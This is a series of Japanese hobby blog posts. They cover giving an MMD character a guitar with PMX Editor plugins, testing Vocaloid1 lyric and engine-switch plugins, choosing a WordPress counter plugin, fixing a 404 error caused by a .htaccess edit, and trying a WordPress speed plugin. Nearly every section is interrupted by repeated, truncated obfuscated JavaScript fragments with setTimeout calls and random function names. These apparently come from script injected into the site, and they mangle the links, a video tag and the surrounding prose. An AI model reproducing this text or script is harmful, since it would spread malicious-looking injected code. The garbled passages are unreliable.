【MMD】人物にギターを持たせる

人物にギターを持たせるで検索すると、腕IKをつけましょうというのがみつかります。

たしかに、腕IKがあったほうがその後の演奏モーションつけるのが楽になります。

ということで、いろいろ調べた結果、標準モデルと同じ構造だと腕IKをつけたりするのが

簡略化できるプラグインがあったりしたので、備忘録的にまとめておきます。

まず、ギターはアクセサリで読み込むことが前提。

手順は、以下のような感じになります。

1.PMX Editer起動

1-1.腕IKをモデルに追加

1-2.ギターボーンを追加(ギターのアクセサリをくっつける部分)

2.MMD起動

2-1.モデル読み込み

2-2.ギター読み込み

2-3.ギターをギターボーンの位置に設定

1-1と1-2を自動でやってくれるプラグインがあったので紹介という感じです。

では、具体的な話。

事前準備として、必要なファイルをダウンロードします。

配付サイトはこちら

MMD BE STUDIOdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}https://sites.google.com/site/mmdbes/home

ダウンロードするものは、以下の3つです。

・GuitarStrapInstallerX

・strap pmd v5 本記事作成中の最新バージョンでした

・IKMaker(PMD版もありますが、ここではPMX版を使用して説明しています)

セットアップはサイトに書いてあるので省略します。

1.PmxEditor起動

2.モデル読み込み

3.腕IK追加

ここでは、プラグインでIKMakerXで追加します。

プラグインを起動すると以下のウィンドウが表示されます。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

そのまま実行ボタンをクリックするだけです。

以下のようにボーンに右腕IKと左腕IKが追加されています

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

4.ギターボーン追加

GuitarStrapInstallerXを使用

このプラグインだと、ギター用のストラップをつけるのも組み込まれています。

そのため、プラグインでGuitarStrapInstallerXを選択するとファイルを開くダイアログがでるのでstrap_v5.pmdを選択してください。(最新のpmdを選択)

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

何も変更せずにRunをクリックするだけです。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

こんな感じで左肩にストラップが追加された状態になります。

(ストラップはあとでボーンの位置を変更してギターにくっつけます)

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

このGUMIさんの場合、25~29でギター用のボーンが追加されています。

5.MMD起動してモデルにギターを持たせる

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

MMD起動して、ギターのアクセサリを読み込み。

ギターを追加されたGuitarSの位置に設定したのが上記の図です。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

ストラップはこんな感じで位置調整しましょう。

前の部分をギターの位置にあわせている図です。

具体的なやり方は、配布元のサイトで動画があるのでみてみると良いと思います。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

ギターのストラップをある程度調整したあとの、後ろから撮ったもの。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

ギター、ベース、キーボード、ドラム、ボーカルという基本構成で並べてみました。

ギターとベース以外はかなり適当です。

(ギターとベースも適当だろうといわれるかもしれないけど・・・)

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

ぐみさんのギター正面から。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

ちょっと斜めから。

というわけで、標準的なモデルだとプラグインのおかげで簡単に設定可能というお話でした。

あとはギターモーション作成ですね。

これまた、演奏技術のない私はどうやってなんちゃってギターモーションを作るかぐぐりまくりで探してみました。

なかなか自然にならないけど、とりあえず、こんな感じ

[nicolink vidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”sm18583125″]

midiからギターモーションを作成するツール「jamplay」を利用しています。

両肩のモーションは削除しています。その他、腕IKの位置を適宜修正。

Gたまさんが公開しているモーションの左手の指部分をつかったりなどしています。

「jamplay」配付元サイト

AnotherT/VLdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}http://chaba.sakura.ne.jp/vl/

なんちゃってモーション程度の備忘録はまた気が向いた時に作ろうかと思います。

Vocaloid1用拡張ツール めーこといっしょ(仮名) LyricSupport(更新)とQuickSwitch(新規)を試してみた

配布サイトはこちら。

Vocaloid1用拡張ツール めーこといっしょ(仮名)

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}http://www.geocities.jp/hatsune_wave/vocaloid1.html

LyricSupport(7/30更新):歌詞の流し込みダイアログ拡張プラグイン

QuickSwitch(6/18新規):合成エンジンのバージョンを再起動なしで切り替えるプラグイン

LyricSupport

更新履歴をみると以下に対応したようです。

 流し込み時にくっつける文字種として「ぁぃぅぇぉゎァィゥェォヮ」を追加

そういえば、小文字をいれると文字が分割されるから小文字があるときは流し込みじゃなくてちゃんと1文字ずつ入れてたのを思い出しました。

さっそくプラグインをいれて、以下のような文字を流し込んでみました。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

おお、ちゃんと入りました。

流し込みはもはや無くてはならないツールになっているので、こういう更新はとてもありがたいです。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

QuickSwitch

READMEに改定ある目的は、「再起動なしで合成エンジンのバージョン切り替えを可能にします。」とのことです。

これ、たまに合成エンジンを変えるときにいちいちエディタを再起動しないといけないから面倒だなとおもっていたんですよね。

ためしたら、うまくいきました。

ちなみに合成エンジンは、以下の設定で1.1か1.0のどちらかを選択です。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

ないしょの人さん、プラグインありがとうございます。dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

ブログのカウンターを変更

今まではFC2の無料カウンターを設置していました。

でも、時間帯によってはとても重くてなかなか表示されないこともあるので自分のサイトにカウンターを設置することにしました。

無料で公開されているcgiやPHPで作成されたものもあるのですが、せっかくWoredPressを使用しているので使えそうなpluginがないか探してみました。

Woredpress カウンターで探すと以下のようなプラグインがでてきました。

・Counterize II

 とても多くのブログで紹介されていましたが、私が求めているものとは違いました。

 Todayで表示される数が24時間っぽいです。

 ソースなせばいいのかもしれないですが、ログ解析もできるためソース量が結構あります。

 面倒になって投げました。

・WP SlimStat

 これは解析用だったのでカウンターじゃなかったです。

 とはいっても、ためしにいれてみました。

 botがいっぱい来ているのが良く分かるようになりました。

 というかほとんどbotしか着てない(><

 

 人間かもん!!

・WP SlimStat EX

 ログを解析するのが主ですが、カウンター表示もできるみたいなので入れてみました。

 ですがなぜか、カウンターが0のまま増えないので断念。

 ソース途中まで見ましたが面倒になって投げ捨てました。

 

・Count Per Day

 そこまでシンプルではないですが、求めるものに近い気がします。

 上に書いた3つは導入して2日たっているけどこれは、まだ1日たっていません。

 しばらく様子見です。

 ちなみに文字でカウンター表示です。軽いほうがいいので文字のまま使ってます。

 シンプルな内容ですがダッシュボード上に解析結果が表示されます。

Count Per Dayについて

Count per Day 本体

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}http://wordpress.org/extend/plugins/count-per-day/

日本語化のサイト

Count per Day 日本語化 | Sea Sidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}de Cross

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}http://juno.main.jp/blog/2011/03/22/count-per-day-ja/

ウィジットのところで、こんな感じに表示されるのでチェックすればいいです。

個別に細かく設定したい人は、そういう書き方が用意されているみたいですが、私はこの標準機能で十分だったので試していません。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

WordPress 404エラーが出るようになってしまいあせりました

各記事をクリックすると、なぜか404エラーが表示されるようになってしま、もしかして、WordPressを3.2にバージョンアップしたのがまずかったのかと思い、バージョンアップ前に戻したりしても直らない。

パーマリンクがカスタマイズになっているので、デフォルトにしたら表示されるようになりました。

しかし、googleなどで検索したときはカスタマイズしたほうのURLで飛んでくるため404エラーで表示されない状態。

そんなことをしていたのが出社前の朝でした。

とりあえず、デフォルト状態で出社。

ホテルに戻ってから原因調査。

ホテルの回線でリモートで自宅PCに入るのは遅すぎてつらいです。

そして、思い出したのが、WP Super Cache の プラグインをいれようとして.htaccessファイルの中身を書き換えたのを思い出しました。

これを書き直す前に戻したら正常に動くようになりました。

WP Super Cacheをインストール後、一回したページのキャッシュが作成されないからおかしいなと思っていたら、どうも正しく動いてなかったみたい。

WP Super Cacheを入れるのは、また今度時間ができてからやろうと思います。

テスト用の環境のほうで試してから正式な環境に入れることにします。

めんどくさいからといって、横着したのがいけませんでした。

WordPressを高速化するプラグイン「WP Hyper Response」を導入してみた

WordPressを高速化するプラグインができたという記事をみてさっそく導入してみました。

サイト

Stocker.jp – diary

「WordPressを高速化するプラグインを作りました」

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}http://stocker.jp/diary/wp-hyper-response/

プラグイン名:WP Hyper Response

このプラグインはインストールするだけで設定項目はありません。

なお、2011/6/1の追記でバグフィックス版を公開したとありました。

バージョン1.3以前は

「WordPressの管理画面が真っ白になる」「リダイレクトエラーが出る」

といった不具合が報告されたために対応したとのこと。

私はバージョン1.3を導入して、細かい作業はしていませんがいい感じに動いているのを確認しました。

作者のコメントを読んでいると管理画面のレスポンスがかなりよくなるようです。

光回線ではあまり速度改善したかよくわかりませんが、モバイル回線(3Gの7.2MB)では確かにレスポンスがよくなりました。

まだ入れてすぐなので、どこまで安定動作するかわからないため、しばらく様子をみたいと思います。